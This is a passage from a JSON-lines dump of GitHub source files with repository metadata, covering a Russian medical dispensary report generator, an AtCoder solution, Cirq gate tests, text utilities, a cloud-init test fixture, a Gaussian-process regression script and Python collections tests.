rbHealthGroup ON rbHealthGroup.id = Diagnostic.healthGroup_id\n LEFT JOIN rbDispanser ON rbDispanser.id = Diagnostic.dispanser_id\n LEFT JOIN rbDiagnosticResult ON rbDiagnosticResult.id = Diagnostic.result_id\n LEFT JOIN Account_Item ON ( Account_Item.id = (SELECT max(AI.id) FROM Account_Item AS AI WHERE AI.event_id = Event.id AND AI.deleted=0 AND AI.date IS NOT NULL AND AI.refuseType_id IS NULL AND AI.reexposeItem_id IS NULL AND AI.visit_id IS NULL AND AI.action_id IS NULL)\n )\nWHERE\n Event.deleted=0 AND Diagnostic.deleted=0 AND %s\nORDER BY\n Event.client_id, Diagnosis.mkb, Diagnostic.diagnosisType_id, Diagnostic.id\n \"\"\"\n db = QtGui.qApp.db\n tableEvent = db.table('Event')\n cond = []\n addDateInRange(cond, tableEvent['execDate'], begDate, endDate)\n if eventTypeId:\n cond.append(tableEvent['eventType_id'].eq(eventTypeId))\n if onlyPermanentAttach:\n cond.append(havePermanentAttach(endDate))\n if onlyPayedEvents:\n cond.append('isEventPayed(Event.id)')\n tableAccountItem = db.table('Account_Item')\n addDateInRange(cond, tableAccountItem['date'], begPayDate, endPayDate)\n return db.query(stmt % (db.joinAnd(cond)))\n\n\nclass CStatReport1NP5000(CReport):\n def __init__(self, parent):\n CReport.__init__(self, parent)\n self.setPayPeriodVisible(True)\n self.setTitle(u'Итоги дополнительной диспансеризации граждан (5000)', u'Итоги дополнительной диспансеризации')\n\n\n def build(self, params):\n global Columns\n global Rows\n\n begDate = params.get('begDate', QtCore.QDate())\n endDate = params.get('endDate', QtCore.QDate())\n eventTypeId = params.get('eventTypeId', None)\n onlyPermanentAttach = params.get('onlyPermanentAttach', False)\n onlyPayedEvents = params.get('onlyPayedEvents', False)\n begPayDate = params.get('begPayDate', QtCore.QDate())\n endPayDate = params.get('endPayDate', QtCore.QDate())\n\n mapColumns = createMapCodeToRowIdx( [column[0] for column in Columns] )\n reportRowSize = len(Columns)\n reportData = [ [0] * reportRowSize for row in xrange(5) ]\n query = selectData(begDate, endDate, eventTypeId, onlyPermanentAttach, onlyPayedEvents, begPayDate, endPayDate)\n\n prevClientId = None\n clientData = None\n while query.next() :\n record = query.record()\n clientId = forceInt(record.value('client_id'))\n mkb = normalizeMKB(forceString(record.value('mkb')))\n r2 = forceBool(record.value('R2b'))\n final = forceBool(record.value('final'))\n r3 = 
final and r2 and forceBool(record.value('R3c'))\n r4 = final and r2 and forceBool(record.value('R4c'))\n r5 = final and r2 and forceBool(record.value('R5c'))\n r6 = r5 and forceBool(record.value('R6c'))\n\n if prevClientId != clientId:\n addClientData(reportData, clientData)\n clientData = [ [False] * reportRowSize for row in xrange(5) ]\n prevClientId = clientId\n\n diagColumns = mapColumns.get(mkb, [])\n if not r2 and diagColumns:\n pass\n if r2:\n setSigns(clientData, 0, diagColumns)\n if r3:\n setSigns(clientData, 1, diagColumns)\n if r4:\n setSigns(clientData, 2, diagColumns)\n if r5:\n setSigns(clientData, 3, diagColumns)\n if r6:\n setSigns(clientData, 4, diagColumns)\n addClientData(reportData, clientData)\n\n\n # now text\n doc = QtGui.QTextDocument()\n cursor = QtGui.QTextCursor(doc)\n\n cursor.setCharFormat(CReportBase.ReportTitle)\n cursor.insertText(u'Итоги дополнительной диспансеризации граждан')\n cursor.insertBlock()\n self.dumpParams(cursor, params)\n cursor.insertText(u'(5000)')\n cursor.insertBlock()\n\n tableColumns = [\n ('15%', [u'Наименование заболевания', u'', u'1', u'Код по МКБ-10'], CReportBase.AlignLeft),\n ('4.2%', [u'№ строки', u'', u'2', '01'], CReportBase.AlignCenter),\n ('4.2%', [Columns[0][1], u'', u'3', Columns[0][0]], CReportBase.AlignRight),\n ]\n tableColumns.extend([('4.2%', [u'', Columns[i][1], str(i+3), Columns[i][0]], CReportBase.AlignRight) for i in xrange(1, len(Columns))])\n\n table = createTable(cursor, tableColumns)\n table.mergeCells(0, 0, 2, 1)\n table.mergeCells(0, 1, 2, 1)\n table.mergeCells(0, 2, 2, 1)\n table.mergeCells(0, 3, 1, len(Columns)-1)\n\n for iRow, row in enumerate(Rows):\n i = table.addRow()\n for j in xrange(2):\n table.setText(i, j, row[j], CReportBase.TableHeader)\n for j in xrange(reportRowSize):\n table.setText(i, 2+j, reportData[iRow][j])\n return doc\n\ndef setSigns(clientData, row, columns):\n clientLine = clientData[row]\n for column in columns:\n clientLine[column] = True\n\ndef addClientData(reportData, clientData):\n if clientData:\n for row, clientLine in enumerate(clientData):\n reportLine = reportData[row]\n for column, sign in enumerate(clientLine):\n if sign:\n reportLine[column] += 1\n","repo_name":"dio4/vista_1","sub_path":"Reports/StatReport1NP5000.py","file_name":"StatReport1NP5000.py","file_ext":"py","file_size_in_byte":10310,"program_lang":"python","lang":"ru","doc_type":"code","stars":1,"dataset":"github-code","pt":"77"} +{"seq_id":"30337329766","text":"# -*- coding: utf-8 -*-\n# A - Round Up the Mean\n# https://atcoder.jp/contests/abc082/tasks/abc082_a\n\na, b = map(int, input().split())\ncalc = int((a + b) / 2)\ncheck = (a + b) % 2\n\nif check == 0:\n print(calc)\nelse:\n calc += 1\n print(calc)\n","repo_name":"yu5shi8/AtCoder","sub_path":"ABC_A/ABC082A.py","file_name":"ABC082A.py","file_ext":"py","file_size_in_byte":246,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"22175167616","text":"import cirq\nimport cirq.contrib.acquaintance as cca\n\n\ndef test_circular_shift_gate_init():\n g = cca.CircularShiftGate(4, 2)\n assert g.num_qubits() == 4\n assert g.shift == 2\n\n g = cca.CircularShiftGate(4, 1, swap_gate=cirq.CZ)\n assert g.swap_gate == cirq.CZ\n\n\ndef test_circular_shift_gate_eq():\n equals_tester = cirq.testing.EqualsTester()\n equals_tester.add_equality_group(cca.CircularShiftGate(4, 1), cca.CircularShiftGate(4, 1))\n equals_tester.add_equality_group(cca.CircularShiftGate(4, 1, swap_gate=cirq.CZ))\n 
equals_tester.add_equality_group(cca.CircularShiftGate(4, 2))\n equals_tester.add_equality_group(cca.CircularShiftGate(3, 2))\n equals_tester.add_equality_group(cca.CircularShiftGate(3, 2, swap_gate=cirq.CZ))\n\n\ndef test_circular_shift_gate_permutation():\n assert cca.CircularShiftGate(3, 4).permutation() == {0: 2, 1: 0, 2: 1}\n assert cca.CircularShiftGate(4, 0).permutation() == {0: 0, 1: 1, 2: 2, 3: 3}\n\n assert cca.CircularShiftGate(5, 2).permutation() == {0: 3, 1: 4, 2: 0, 3: 1, 4: 2}\n\n\ndef test_circular_shift_gate_repr():\n g = cca.CircularShiftGate(3, 2)\n cirq.testing.assert_equivalent_repr(g)\n\n\ndef test_circular_shift_gate_decomposition():\n qubits = [cirq.NamedQubit(q) for q in 'abcdef']\n\n circular_shift = cca.CircularShiftGate(2, 1, cirq.CZ)(*qubits[:2])\n circuit = cirq.expand_composite(cirq.Circuit(circular_shift))\n expected_circuit = cirq.Circuit((cirq.Moment((cirq.CZ(*qubits[:2]),)),))\n assert circuit == expected_circuit\n\n no_decomp = lambda op: (isinstance(op, cirq.GateOperation) and op.gate == cirq.SWAP)\n circular_shift = cca.CircularShiftGate(6, 3)(*qubits)\n circuit = cirq.expand_composite(cirq.Circuit(circular_shift), no_decomp=no_decomp)\n actual_text_diagram = circuit.to_text_diagram().strip()\n expected_text_diagram = \"\"\"\na: ───────────×───────────\n │\nb: ───────×───×───×───────\n │ │\nc: ───×───×───×───×───×───\n │ │ │\nd: ───×───×───×───×───×───\n │ │\ne: ───────×───×───×───────\n │\nf: ───────────×───────────\n \"\"\".strip()\n assert actual_text_diagram == expected_text_diagram\n\n circular_shift = cca.CircularShiftGate(6, 2)(*qubits)\n circuit = cirq.expand_composite(cirq.Circuit(circular_shift), no_decomp=no_decomp)\n actual_text_diagram = circuit.to_text_diagram().strip()\n expected_text_diagram = \"\"\"\na: ───────×───────────────\n │\nb: ───×───×───×───────────\n │ │\nc: ───×───×───×───×───────\n │ │\nd: ───────×───×───×───×───\n │ │\ne: ───────────×───×───×───\n │\nf: ───────────×───×───────\n \"\"\".strip()\n assert actual_text_diagram == expected_text_diagram\n\n\ndef test_circular_shift_gate_wire_symbols():\n qubits = [cirq.NamedQubit(q) for q in 'xyz']\n circuit = cirq.Circuit(cca.CircularShiftGate(3, 2)(*qubits))\n actual_text_diagram = circuit.to_text_diagram().strip()\n expected_text_diagram = \"\"\"\nx: ───╲0╱───\n │\ny: ───╲1╱───\n │\nz: ───╱2╲───\n \"\"\".strip()\n assert actual_text_diagram == expected_text_diagram\n\n actual_text_diagram = circuit.to_text_diagram(use_unicode_characters=False)\n expected_text_diagram = r\"\"\"\nx: ---\\0/---\n |\ny: ---\\1/---\n |\nz: ---/2\\---\n \"\"\".strip()\n assert actual_text_diagram.strip() == expected_text_diagram\n","repo_name":"quantumlib/Cirq","sub_path":"cirq-core/cirq/contrib/acquaintance/shift_test.py","file_name":"shift_test.py","file_ext":"py","file_size_in_byte":3970,"program_lang":"python","lang":"en","doc_type":"code","stars":3974,"dataset":"github-code","pt":"77"}
+{"seq_id":"11452426806","text":"import re\nimport numpy as np\nalphabets= \"([A-Za-z])\"\nprefixes = \"(Mr|St|Mrs|Ms|Dr)[.]\"\nsuffixes = \"(Inc|Ltd|Jr|Sr|Co)\"\nstarters = \"(Mr|Mrs|Ms|Dr|He\\s|She\\s|It\\s|They\\s|Their\\s|Our\\s|We\\s|But\\s|However\\s|That\\s|This\\s|Wherever)\"\nacronyms = \"([A-Z][.][A-Z][.](?:[A-Z][.])?)\"\nwebsites = \"[.](com|net|org|io|gov)\"\n\nclass Utils:\n\n @staticmethod\n def split_into_sentences(text):\n text = \" \" + text + \" \"\n text = text.replace(\"\\n\",\" \")\n text = re.sub(prefixes,\"\\\\1<prd>\",text)\n text = re.sub(websites,\"<prd>\\\\1\",text)\n if \"Ph.D\" in text: text
= text.replace(\"Ph.D.\",\"PhD\")\n text = re.sub(\"\\s\" + alphabets + \"[.] \",\" \\\\1 \",text)\n text = re.sub(acronyms+\" \"+starters,\"\\\\1 \\\\2\",text)\n text = re.sub(alphabets + \"[.]\" + alphabets + \"[.]\" + alphabets + \"[.]\",\"\\\\1\\\\2\\\\3\",text)\n text = re.sub(alphabets + \"[.]\" + alphabets + \"[.]\",\"\\\\1\\\\2\",text)\n text = re.sub(\" \"+suffixes+\"[.] \"+starters,\" \\\\1 \\\\2\",text)\n text = re.sub(\" \"+suffixes+\"[.]\",\" \\\\1\",text)\n text = re.sub(\" \" + alphabets + \"[.]\",\" \\\\1\",text)\n if \"”\" in text: text = text.replace(\".”\",\"”.\")\n if \"\\\"\" in text: text = text.replace(\".\\\"\",\"\\\".\")\n if \"!\" in text: text = text.replace(\"!\\\"\",\"\\\"!\")\n if \"?\" in text: text = text.replace(\"?\\\"\",\"\\\"?\")\n text = text.replace(\".\",\".\")\n text = text.replace(\"?\",\"?\")\n text = text.replace(\"!\",\"!\")\n text = text.replace(\"\",\".\")\n sentences = text.split(\"\")\n sentences = sentences[:-1]\n sentences = [s.strip() for s in sentences]\n return sentences\n @staticmethod\n def largest_indices(ary, n):\n \"\"\"Returns the n largest indices from a numpy array.\"\"\"\n flat = ary.flatten()\n indices = np.argpartition(flat, -n)[-n:]\n indices = indices[np.argsort(-flat[indices])]\n return np.unravel_index(indices, ary.shape)\n","repo_name":"MathewAlexander/web_similarity","sub_path":"utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":1924,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"77"} +{"seq_id":"10094326504","text":"from unittest import mock\n\nimport pytest\n\nfrom cloudinit import subp\n\n\n@pytest.yield_fixture(autouse=True)\ndef disable_subp_usage(request):\n \"\"\"\n Across all (pytest) tests, ensure that subp.subp is not invoked.\n\n Note that this can only catch invocations where the util module is imported\n and ``subp.subp(...)`` is called. ``from cloudinit.subp mport subp``\n imports happen before the patching here (or the CiTestCase monkey-patching)\n happens, so are left untouched.\n\n To allow a particular test method or class to use subp.subp you can set the\n parameter passed to this fixture to False using pytest.mark.parametrize::\n\n @pytest.mark.parametrize(\"disable_subp_usage\", [False], indirect=True)\n def test_whoami(self):\n subp.subp([\"whoami\"])\n\n To instead allow subp.subp usage for a specific command, you can set the\n parameter passed to this fixture to that command:\n\n @pytest.mark.parametrize(\"disable_subp_usage\", [\"bash\"], indirect=True)\n def test_bash(self):\n subp.subp([\"bash\"])\n\n To specify multiple commands, set the parameter to a list (note the\n double-layered list: we specify a single parameter that is itself a list):\n\n @pytest.mark.parametrize(\n \"disable_subp_usage\", [\"bash\", \"whoami\"], indirect=True)\n def test_several_things(self):\n subp.subp([\"bash\"])\n subp.subp([\"whoami\"])\n\n This fixture (roughly) mirrors the functionality of\n CiTestCase.allowed_subp. N.B. 
While autouse fixtures do affect non-pytest\n tests, CiTestCase's allowed_subp does take precedence (and we have\n TestDisableSubpUsageInTestSubclass to confirm that).\n \"\"\"\n should_disable = getattr(request, \"param\", True)\n if should_disable:\n if not isinstance(should_disable, (list, str)):\n def side_effect(args, *other_args, **kwargs):\n raise AssertionError(\"Unexpectedly used subp.subp\")\n else:\n # Look this up before our patch is in place, so we have access to\n # the real implementation in side_effect\n real_subp = subp.subp\n\n if isinstance(should_disable, str):\n should_disable = [should_disable]\n\n def side_effect(args, *other_args, **kwargs):\n cmd = args[0]\n if cmd not in should_disable:\n raise AssertionError(\n \"Unexpectedly used subp.subp to call {} (allowed:\"\n \" {})\".format(cmd, \",\".join(should_disable))\n )\n return real_subp(args, *other_args, **kwargs)\n\n with mock.patch('cloudinit.subp.subp', autospec=True) as m_subp:\n m_subp.side_effect = side_effect\n yield\n else:\n yield\n","repo_name":"baihonglei-git/cloud-init","sub_path":"conftest.py","file_name":"conftest.py","file_ext":"py","file_size_in_byte":2801,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"}
+{"seq_id":"37821601098","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu Nov 25 00:42:12 2021\n\n@author: seongjoon kang\n\n\"\"\"\n\nimport numpy as np\nimport pandas as pd \nimport matplotlib.pylab as plt\nfrom sklearn.metrics import mean_squared_error\nimport time\nimport random\nfrom sklearn import gaussian_process\nfrom sklearn.gaussian_process.kernels import RBF, Matern, WhiteKernel\nfrom sklearn.gaussian_process.kernels import ConstantKernel, ExpSineSquared,DotProduct\nnp.random.seed(12)\n\n\n\ndata = pd.read_csv('jj.csv')\ndata = np.array(data)\nall_x = data[:,0]\ny_all = data[:,1]\n\ntest_ind1 = (np.arange(1970, 1975) - 1960)*4\ntest_ind1 = np.arange(min(test_ind1), max(test_ind1))\ntest_ind2 = (np.arange(1980, 1991) - 1960) *4\ntest_ind2 = np.arange(min(test_ind2), max(test_ind2))\n# indices of test data\ntest_ind = np.append(test_ind1, test_ind2)\n# indices of train data\ntrain_ind = list (set(all_x) - set(test_ind))\ntrain_ind = np.array(train_ind, dtype= int)\n# get train data from the whole data\nX_train = all_x[train_ind-1]\nbeta_inv = .01\nX_train = np.array(X_train, dtype = int)\ny_train = data[X_train-1][:,1] +np.random.randn(len(X_train))*np.sqrt(beta_inv)#generative_func(X_train)+np.random.randn(len(X_train))*np.sqrt(beta_inv)\n\nplt.figure()\nplt.plot(all_x, y_all, label='true function')\nplt.plot(X_train, y_train, '.r', label='training sample (noisy)')\nplt.title(\"Total Data and Train Data\")\nplt.xlabel('x')\nplt.xticks(np.arange(len(all_x), step = 20), np.arange(1960, 1985, step = 5))\nplt.grid()\nplt.ylabel('y')\nplt.legend()\nplt.savefig('data.png')\n\nkernel = 4*RBF(length_scale=20) + 11*ExpSineSquared(periodicity= 10,length_scale=1.1)*RBF(length_scale=13) + 3*WhiteKernel()\n#kernel = 0.0015*DotProduct() + ExpSineSquared(periodicity= 10,length_scale=1.1) \\\n#+ 3*RBF(length_scale = 20) + WhiteKernel()\nplt.figure()\nplt.imshow(kernel(np.array([all_x]).T))\nplt.colorbar()\nplt.title('kernel pre-fitting')\nplt.savefig('kernel_pre_fitting.png')\n\ngp = gaussian_process.GaussianProcessRegressor(kernel=kernel,normalize_y=True, \n alpha=0, n_restarts_optimizer=200)\ngp.fit(X_train.reshape(-1,1), y_train.reshape(-1,1))\nprint
(gp.kernel_)\nplt.figure()\nplt.imshow(gp.kernel_(np.array([all_x]).T))\nplt.colorbar()\nplt.title('kernel post-fitting')\nplt.savefig('kernel_post-fitting')\n\n\nplt.figure()\nall_x2 = np.append(all_x, np.arange(85, 120))\nmus, sigmas = gp.predict(all_x2.reshape(-1,1), return_std=True)\n#plt.plot(all_x2, mus[:,0]+ np.sqrt(sigmas),'k',lw = 0.5)\n#plt.plot(all_x2, mus[:,0]- np.sqrt(sigmas),'k',lw = 0.5)\nplt.plot(all_x2, mus[:,0],'k', label = 'predicted mean')\nplt.fill_between(all_x2, y1 = mus[:,0] + np.sqrt(sigmas), y2 =mus[:,0]- np.sqrt(sigmas), \n color='r', label = 'confident range of predicted values')\nplt.plot(all_x, y_all, 'b', label = 'original data')\n\n\nplt.xticks(np.arange(0,len(all_x2)+20, step = 20), np.arange(1960, 1995, step = 5))\nplt.xlabel ('Year')\nplt.ylabel ('Earning')\nplt.title ('Johnson&Johnson Data')\nplt.legend()\nplt.grid()\nplt.savefig('final_predition.png')","repo_name":"sk8053/useful_work","sub_path":"probablistic_time_seris_labs_DS_GA_1018/gaussian_process_example.py","file_name":"gaussian_process_example.py","file_ext":"py","file_size_in_byte":3026,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"1718121112","text":"import unittest, doctest\nfrom test import test_support\nfrom collections import namedtuple\nimport pickle, cPickle, copy\nfrom collections import Hashable, Iterable, Iterator\nfrom collections import Sized, Container, Callable\nfrom collections import Set, MutableSet\nfrom collections import Mapping, MutableMapping\nfrom collections import Sequence, MutableSequence\n\nTestNT = namedtuple('TestNT', 'x y z') # type used for pickle tests\n\nclass TestNamedTuple(unittest.TestCase):\n\n def test_factory(self):\n Point = namedtuple('Point', 'x y')\n self.assertEqual(Point.__name__, 'Point')\n self.assertEqual(Point.__doc__, 'Point(x, y)')\n self.assertEqual(Point.__slots__, ())\n self.assertEqual(Point.__module__, __name__)\n self.assertEqual(Point.__getitem__, tuple.__getitem__)\n self.assertEqual(Point._fields, ('x', 'y'))\n\n self.assertRaises(ValueError, namedtuple, 'abc%', 'efg ghi') # type has non-alpha char\n self.assertRaises(ValueError, namedtuple, 'class', 'efg ghi') # type has keyword\n self.assertRaises(ValueError, namedtuple, '9abc', 'efg ghi') # type starts with digit\n\n self.assertRaises(ValueError, namedtuple, 'abc', 'efg g%hi') # field with non-alpha char\n self.assertRaises(ValueError, namedtuple, 'abc', 'abc class') # field has keyword\n self.assertRaises(ValueError, namedtuple, 'abc', '8efg 9ghi') # field starts with digit\n self.assertRaises(ValueError, namedtuple, 'abc', '_efg ghi') # field with leading underscore\n self.assertRaises(ValueError, namedtuple, 'abc', 'efg efg ghi') # duplicate field\n\n namedtuple('Point0', 'x1 y2') # Verify that numbers are allowed in names\n namedtuple('_', 'a b c') # Test leading underscores in a typename\n\n nt = namedtuple('nt', u'the quick brown fox') # check unicode input\n self.assert_(\"u'\" not in repr(nt._fields))\n nt = namedtuple('nt', (u'the', u'quick')) # check unicode input\n self.assert_(\"u'\" not in repr(nt._fields))\n\n self.assertRaises(TypeError, Point._make, [11]) # catch too few args\n self.assertRaises(TypeError, Point._make, [11, 22, 33]) # catch too many args\n\n def test_instance(self):\n Point = namedtuple('Point', 'x y')\n p = Point(11, 22)\n self.assertEqual(p, Point(x=11, y=22))\n self.assertEqual(p, Point(11, y=22))\n self.assertEqual(p, Point(y=22, x=11))\n self.assertEqual(p, Point(*(11, 22)))\n 
self.assertEqual(p, Point(**dict(x=11, y=22)))\n self.assertRaises(TypeError, Point, 1) # too few args\n self.assertRaises(TypeError, Point, 1, 2, 3) # too many args\n self.assertRaises(TypeError, eval, 'Point(XXX=1, y=2)', locals()) # wrong keyword argument\n self.assertRaises(TypeError, eval, 'Point(x=1)', locals()) # missing keyword argument\n self.assertEqual(repr(p), 'Point(x=11, y=22)')\n self.assert_('__dict__' not in dir(p)) # verify instance has no dict\n self.assert_('__weakref__' not in dir(p))\n self.assertEqual(p, Point._make([11, 22])) # test _make classmethod\n self.assertEqual(p._fields, ('x', 'y')) # test _fields attribute\n self.assertEqual(p._replace(x=1), (1, 22)) # test _replace method\n self.assertEqual(p._asdict(), dict(x=11, y=22)) # test _asdict method\n\n try:\n p._replace(x=1, error=2)\n except ValueError:\n pass\n else:\n self._fail('Did not detect an incorrect fieldname')\n\n # verify that field string can have commas\n Point = namedtuple('Point', 'x, y')\n p = Point(x=11, y=22)\n self.assertEqual(repr(p), 'Point(x=11, y=22)')\n\n # verify that fieldspec can be a non-string sequence\n Point = namedtuple('Point', ('x', 'y'))\n p = Point(x=11, y=22)\n self.assertEqual(repr(p), 'Point(x=11, y=22)')\n\n def test_tupleness(self):\n Point = namedtuple('Point', 'x y')\n p = Point(11, 22)\n\n self.assert_(isinstance(p, tuple))\n self.assertEqual(p, (11, 22)) # matches a real tuple\n self.assertEqual(tuple(p), (11, 22)) # coercable to a real tuple\n self.assertEqual(list(p), [11, 22]) # coercable to a list\n self.assertEqual(max(p), 22) # iterable\n self.assertEqual(max(*p), 22) # star-able\n x, y = p\n self.assertEqual(p, (x, y)) # unpacks like a tuple\n self.assertEqual((p[0], p[1]), (11, 22)) # indexable like a tuple\n self.assertRaises(IndexError, p.__getitem__, 3)\n\n self.assertEqual(p.x, x)\n self.assertEqual(p.y, y)\n self.assertRaises(AttributeError, eval, 'p.z', locals())\n\n def test_odd_sizes(self):\n Zero = namedtuple('Zero', '')\n self.assertEqual(Zero(), ())\n self.assertEqual(Zero._make([]), ())\n self.assertEqual(repr(Zero()), 'Zero()')\n self.assertEqual(Zero()._asdict(), {})\n self.assertEqual(Zero()._fields, ())\n\n Dot = namedtuple('Dot', 'd')\n self.assertEqual(Dot(1), (1,))\n self.assertEqual(Dot._make([1]), (1,))\n self.assertEqual(Dot(1).d, 1)\n self.assertEqual(repr(Dot(1)), 'Dot(d=1)')\n self.assertEqual(Dot(1)._asdict(), {'d':1})\n self.assertEqual(Dot(1)._replace(d=999), (999,))\n self.assertEqual(Dot(1)._fields, ('d',))\n\n n = 5000\n import string, random\n names = list(set(''.join([random.choice(string.ascii_letters)\n for j in range(10)]) for i in range(n)))\n n = len(names)\n Big = namedtuple('Big', names)\n b = Big(*range(n))\n self.assertEqual(b, tuple(range(n)))\n self.assertEqual(Big._make(range(n)), tuple(range(n)))\n for pos, name in enumerate(names):\n self.assertEqual(getattr(b, name), pos)\n repr(b) # make sure repr() doesn't blow-up\n d = b._asdict()\n d_expected = dict(zip(names, range(n)))\n self.assertEqual(d, d_expected)\n b2 = b._replace(**dict([(names[1], 999),(names[-5], 42)]))\n b2_expected = range(n)\n b2_expected[1] = 999\n b2_expected[-5] = 42\n self.assertEqual(b2, tuple(b2_expected))\n self.assertEqual(b._fields, tuple(names))\n\n def test_pickle(self):\n p = TestNT(x=10, y=20, z=30)\n for module in pickle, cPickle:\n loads = getattr(module, 'loads')\n dumps = getattr(module, 'dumps')\n for protocol in -1, 0, 1, 2:\n q = loads(dumps(p, protocol))\n self.assertEqual(p, q)\n self.assertEqual(p._fields, 
q._fields)\n\n def test_copy(self):\n p = TestNT(x=10, y=20, z=30)\n for copier in copy.copy, copy.deepcopy:\n q = copier(p)\n self.assertEqual(p, q)\n self.assertEqual(p._fields, q._fields)\n\nclass ABCTestCase(unittest.TestCase):\n\n def validate_abstract_methods(self, abc, *names):\n methodstubs = dict.fromkeys(names, lambda s, *args: 0)\n\n # everything should work will all required methods are present\n C = type('C', (abc,), methodstubs)\n C()\n\n # instantiation should fail if a required method is missing\n for name in names:\n stubs = methodstubs.copy()\n del stubs[name]\n C = type('C', (abc,), stubs)\n self.assertRaises(TypeError, C, name)\n\n\nclass TestOneTrickPonyABCs(ABCTestCase):\n\n def test_Hashable(self):\n # Check some non-hashables\n non_samples = [list(), set(), dict()]\n for x in non_samples:\n self.failIf(isinstance(x, Hashable), repr(x))\n self.failIf(issubclass(type(x), Hashable), repr(type(x)))\n # Check some hashables\n samples = [None,\n int(), float(), complex(),\n str(),\n tuple(), frozenset(),\n int, list, object, type,\n ]\n for x in samples:\n self.failUnless(isinstance(x, Hashable), repr(x))\n self.failUnless(issubclass(type(x), Hashable), repr(type(x)))\n self.assertRaises(TypeError, Hashable)\n # Check direct subclassing\n class H(Hashable):\n def __hash__(self):\n return super(H, self).__hash__()\n __eq__ = Hashable.__eq__ # Silence Py3k warning\n self.assertEqual(hash(H()), 0)\n self.failIf(issubclass(int, H))\n self.validate_abstract_methods(Hashable, '__hash__')\n\n def test_Iterable(self):\n # Check some non-iterables\n non_samples = [None, 42, 3.14, 1j]\n for x in non_samples:\n self.failIf(isinstance(x, Iterable), repr(x))\n self.failIf(issubclass(type(x), Iterable), repr(type(x)))\n # Check some iterables\n samples = [str(),\n tuple(), list(), set(), frozenset(), dict(),\n dict().keys(), dict().items(), dict().values(),\n (lambda: (yield))(),\n (x for x in []),\n ]\n for x in samples:\n self.failUnless(isinstance(x, Iterable), repr(x))\n self.failUnless(issubclass(type(x), Iterable), repr(type(x)))\n # Check direct subclassing\n class I(Iterable):\n def __iter__(self):\n return super(I, self).__iter__()\n self.assertEqual(list(I()), [])\n self.failIf(issubclass(str, I))\n self.validate_abstract_methods(Iterable, '__iter__')\n\n def test_Iterator(self):\n non_samples = [None, 42, 3.14, 1j, \"\".encode('ascii'), \"\", (), [],\n {}, set()]\n for x in non_samples:\n self.failIf(isinstance(x, Iterator), repr(x))\n self.failIf(issubclass(type(x), Iterator), repr(type(x)))\n samples = [iter(str()),\n iter(tuple()), iter(list()), iter(dict()),\n iter(set()), iter(frozenset()),\n iter(dict().keys()), iter(dict().items()),\n iter(dict().values()),\n (lambda: (yield))(),\n (x for x in []),\n ]\n for x in samples:\n self.failUnless(isinstance(x, Iterator), repr(x))\n self.failUnless(issubclass(type(x), Iterator), repr(type(x)))\n self.validate_abstract_methods(Iterator, 'next')\n\n def test_Sized(self):\n non_samples = [None, 42, 3.14, 1j,\n (lambda: (yield))(),\n (x for x in []),\n ]\n for x in non_samples:\n self.failIf(isinstance(x, Sized), repr(x))\n self.failIf(issubclass(type(x), Sized), repr(type(x)))\n samples = [str(),\n tuple(), list(), set(), frozenset(), dict(),\n dict().keys(), dict().items(), dict().values(),\n ]\n for x in samples:\n self.failUnless(isinstance(x, Sized), repr(x))\n self.failUnless(issubclass(type(x), Sized), repr(type(x)))\n self.validate_abstract_methods(Sized, '__len__')\n\n def test_Container(self):\n non_samples = [None, 42, 
3.14, 1j,\n (lambda: (yield))(),\n (x for x in []),\n ]\n for x in non_samples:\n self.failIf(isinstance(x, Container), repr(x))\n self.failIf(issubclass(type(x), Container), repr(type(x)))\n samples = [str(),\n tuple(), list(), set(), frozenset(), dict(),\n dict().keys(), dict().items(),\n ]\n for x in samples:\n self.failUnless(isinstance(x, Container), repr(x))\n self.failUnless(issubclass(type(x), Container), repr(type(x)))\n self.validate_abstract_methods(Container, '__contains__')\n\n def test_Callable(self):\n non_samples = [None, 42, 3.14, 1j,\n \"\", \"\".encode('ascii'), (), [], {}, set(),\n (lambda: (yield))(),\n (x for x in []),\n ]\n for x in non_samples:\n self.failIf(isinstance(x, Callable), repr(x))\n self.failIf(issubclass(type(x), Callable), repr(type(x)))\n samples = [lambda: None,\n type, int, object,\n len,\n list.append, [].append,\n ]\n for x in samples:\n self.failUnless(isinstance(x, Callable), repr(x))\n self.failUnless(issubclass(type(x), Callable), repr(type(x)))\n self.validate_abstract_methods(Callable, '__call__')\n\n def test_direct_subclassing(self):\n for B in Hashable, Iterable, Iterator, Sized, Container, Callable:\n class C(B):\n pass\n self.failUnless(issubclass(C, B))\n self.failIf(issubclass(int, C))\n\n def test_registration(self):\n for B in Hashable, Iterable, Iterator, Sized, Container, Callable:\n class C:\n __metaclass__ = type\n __hash__ = None # Make sure it isn't hashable by default\n self.failIf(issubclass(C, B), B.__name__)\n B.register(C)\n self.failUnless(issubclass(C, B))\n\nclass WithSet(MutableSet):\n\n def __init__(self, it=()):\n self.data = set(it)\n\n def __len__(self):\n return len(self.data)\n\n def __iter__(self):\n return iter(self.data)\n\n def __contains__(self, item):\n return item in self.data\n\n def add(self, item):\n self.data.add(item)\n\n def discard(self, item):\n self.data.discard(item)\n\nclass TestCollectionABCs(ABCTestCase):\n\n # XXX For now, we only test some virtual inheritance properties.\n # We should also test the proper behavior of the collection ABCs\n # as real base classes or mix-in classes.\n\n def test_Set(self):\n for sample in [set, frozenset]:\n self.failUnless(isinstance(sample(), Set))\n self.failUnless(issubclass(sample, Set))\n self.validate_abstract_methods(Set, '__contains__', '__iter__', '__len__')\n\n def test_hash_Set(self):\n class OneTwoThreeSet(Set):\n def __init__(self):\n self.contents = [1, 2, 3]\n def __contains__(self, x):\n return x in self.contents\n def __len__(self):\n return len(self.contents)\n def __iter__(self):\n return iter(self.contents)\n def __hash__(self):\n return self._hash()\n a, b = OneTwoThreeSet(), OneTwoThreeSet()\n self.failUnless(hash(a) == hash(b))\n\n def test_MutableSet(self):\n self.failUnless(isinstance(set(), MutableSet))\n self.failUnless(issubclass(set, MutableSet))\n self.failIf(isinstance(frozenset(), MutableSet))\n self.failIf(issubclass(frozenset, MutableSet))\n self.validate_abstract_methods(MutableSet, '__contains__', '__iter__', '__len__',\n 'add', 'discard')\n\n def test_issue_5647(self):\n # MutableSet.__iand__ mutated the set during iteration\n s = WithSet('abcd')\n s &= 